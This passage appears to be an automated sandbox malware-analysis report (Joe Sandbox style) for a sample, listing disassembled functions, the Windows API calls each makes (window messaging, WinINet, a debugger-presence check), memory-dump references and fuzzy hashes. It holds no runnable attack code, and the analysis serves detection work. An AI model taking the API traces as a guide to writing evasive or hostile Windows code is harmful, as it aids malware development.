                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    • Opcode ID: 08e70db7f01ac068af92ec5c0a9d1a394e905e4f1353915362441677721166cb
                                    • Instruction ID: 21be072f36d10028c61b9eb6e90fd6a4c293968aa47532c58a86981e84016c1a
                                    • Opcode Fuzzy Hash: 08e70db7f01ac068af92ec5c0a9d1a394e905e4f1353915362441677721166cb
                                    • Instruction Fuzzy Hash: 0C21297252421AAFDF14DFA8CC45EFA7BA8FB08314F004629FA95D2290D735E861DB60
                                    Function 00906920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 009069A2
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009069B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    • Opcode ID: 62318b6c8f0e148ce9b6340939f433e6c8d428b34b02e92d29bf87d56a00d8a5
                                    • Instruction ID: 8974011d7b4bec02be9ca69608183bf64ea38bf0b78a008af14694a3feba26d5
                                    • Opcode Fuzzy Hash: 62318b6c8f0e148ce9b6340939f433e6c8d428b34b02e92d29bf87d56a00d8a5
                                    • Instruction Fuzzy Hash: C0116A71110208AFEB108E649C54EAB3AADEB053B8F504728F9B5975E0C775DCA1AB60
                                    Function 008E29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 008E2A22
                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008E2A41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: dacc4fa6b48a1a333c4f8ec08a7ee8312357dc6882f100892b145a8dabba7b96
                                    • Instruction ID: cf031b3b8c1b9377bf094c5730cfaab21e44c857d2c48d4f384f8171389a00b2
                                    • Opcode Fuzzy Hash: dacc4fa6b48a1a333c4f8ec08a7ee8312357dc6882f100892b145a8dabba7b96
                                    • Instruction Fuzzy Hash: 3E1100329042A8ABCB30EA9DDC44FAA77AEFB47314F054031E815E7291D770AD0AC791
                                    Function 008F21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008F222C
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008F2255
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    • Opcode ID: 22682d41a6c9fe7de6bbd4d34011e14f8a6a275f2eb2a0a916619c9fd53ac56c
                                    • Instruction ID: 3ed810b333940fb5f9228c8a99003c99c22bc7f0d702b18812caf4304f505cc2
                                    • Opcode Fuzzy Hash: 22682d41a6c9fe7de6bbd4d34011e14f8a6a275f2eb2a0a916619c9fd53ac56c
                                    • Instruction Fuzzy Hash: B511027054122DBEEB258F618C95EBBFBA8FF06355F10822AFA14C6040D3706991D6F1
                                    Function 008D8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 008DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008DAABC
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008D8E73
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    • Opcode ID: ab224c5add0022c45fd778e95e13c68cb4dd8a45f0223f167fc8a2dd322ff263
                                    • Instruction ID: 589857f317c95e10b1cded2139cb739eb65091e9d89afc8d7f6a434547a8d040
                                    • Opcode Fuzzy Hash: ab224c5add0022c45fd778e95e13c68cb4dd8a45f0223f167fc8a2dd322ff263
                                    • Instruction Fuzzy Hash: 3301B5B5605229EBCB14FBA8CC558FE7769FF45320B540B1AF821A73D1DE315808DB51
                                    Function 008D8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 008DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008DAABC
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 008D8D6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    • Opcode ID: 85c5c5255a84b44ddeaa555d84a5a40e21145af0deaaa14762c7ad29569fbde7
                                    • Instruction ID: f0cb9a04a915cb12391928561b57b32fc1c6c0fe8b3f4caf51ec04501b1253c6
                                    • Opcode Fuzzy Hash: 85c5c5255a84b44ddeaa555d84a5a40e21145af0deaaa14762c7ad29569fbde7
                                    • Instruction Fuzzy Hash: 0E01D871641108ABDB14E7E4CD52AFE77A9EF15300F600116B402E32D1DE119E08D772
                                    Function 008D8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 008DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008DAABC
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 008D8DEE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    • Opcode ID: fda9d33d455f6c9deeb76e50fda5aa2e088f000085dec37aea156f4a223d48c2
                                    • Instruction ID: a7d302b63ceac5785a043c8e1bcaa32c55d7a9521a76b92145a8d6ebad14b9ea
                                    • Opcode Fuzzy Hash: fda9d33d455f6c9deeb76e50fda5aa2e088f000085dec37aea156f4a223d48c2
                                    • Instruction Fuzzy Hash: 8701A7B1A45109ABDB25F6A8C952AFE77A9EF11300F600616B805F33D1DE219E08D672
                                    Function 008E4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp
                                    • String ID: #32770
                                    • API String ID: 2292705959-463685578
                                    • Opcode ID: 64d8eeb9a4019d3654d8ecdf299719cfdaa665cfa9911e7f61eb46d11badc976
                                    • Instruction ID: 55b0444d6d0416ee7f0c0db3d8d92251828751ecc8ee80a6ec9414daaefc1651
                                    • Opcode Fuzzy Hash: 64d8eeb9a4019d3654d8ecdf299719cfdaa665cfa9911e7f61eb46d11badc976
                                    • Instruction Fuzzy Hash: 6DE0D1329043282BD7209B599C45FA7F7ACFB46B71F000057FD04D3051D9609B45C7D1
                                    Function 008BB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008BB314: _memset.LIBCMT ref: 008BB321
                                      • Part of subcall function 008A0940: InitializeCriticalSectionAndSpinCount.KERNEL32(00944158,00000000,00944144,008BB2F0,?,?,?,0088100A), ref: 008A0945
                                    • IsDebuggerPresent.KERNEL32(?,?,?,0088100A), ref: 008BB2F4
                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0088100A), ref: 008BB303
                                    Strings
                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008BB2FE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                    • API String ID: 3158253471-631824599
                                    • Opcode ID: 15034167cb12441c6723987c5c78084404a8d156041d6f027cb263a657e54920
                                    • Instruction ID: 66bb72623c58539d8adcf1d57bf904e010d0103e988b7b812f715b9072084ef0
                                    • Opcode Fuzzy Hash: 15034167cb12441c6723987c5c78084404a8d156041d6f027cb263a657e54920
                                    • Instruction Fuzzy Hash: CDE06D702147118FD7709F68E4047827AE4FF04314F018A2DE456C7751E7F4E408DBA1
                                    Function 008C1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemDirectoryW.KERNEL32(?), ref: 008C1775
                                      • Part of subcall function 008FBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,008C195E,?), ref: 008FBFFE
                                      • Part of subcall function 008FBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 008FC010
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 008C196D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                    • String ID: WIN_XPe
                                    • API String ID: 582185067-3257408948
                                    • Opcode ID: 51b975bbcaa61695ce91e27284ed6b10e3d5cf6de4b192e44a71016e08d005c2
                                    • Instruction ID: b0cf727bf48b36ab4b388c5c911610d0de6be640bcf6788b785382f33c202372
                                    • Opcode Fuzzy Hash: 51b975bbcaa61695ce91e27284ed6b10e3d5cf6de4b192e44a71016e08d005c2
                                    • Instruction Fuzzy Hash: 5FF0F270819009DFDB26DBA0C998BECBAB8FB09304F100099E102A24A5D7308F84DB61
                                    Function 00905998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009059AE
                                    • PostMessageW.USER32(00000000), ref: 009059B5
                                      • Part of subcall function 008E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E52BC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 91e9e4d45ae91c785df03b9e67d3e1bb276dda3c3549df7a9cc818ddf3df53f7
                                    • Instruction ID: 2b51708fa38b91938f60fe4d73d57dc4537d49219d006ca530443cde6d5236d6
                                    • Opcode Fuzzy Hash: 91e9e4d45ae91c785df03b9e67d3e1bb276dda3c3549df7a9cc818ddf3df53f7
                                    • Instruction Fuzzy Hash: A3D0C931798311BAE678AB709C1BF976655BB45B55F000825B345EA5D0C9E0A900DA54
                                    Function 00905964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0090596E
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00905981
                                      • Part of subcall function 008E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E52BC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: f69e2f9901871ebb76bd2b8b044d825444fe448eb97e0d54c1666d3e145c0e99
                                    • Instruction ID: 04b4bf9b6efd98fb415c842669af5b36aff436c8b8fedd5300814859acc5ead9
                                    • Opcode Fuzzy Hash: f69e2f9901871ebb76bd2b8b044d825444fe448eb97e0d54c1666d3e145c0e99
                                    • Instruction Fuzzy Hash: 55D0C931798311BAE678AB709C1BFA76A55BB40B55F000825B349AA5D0C9E09900DA54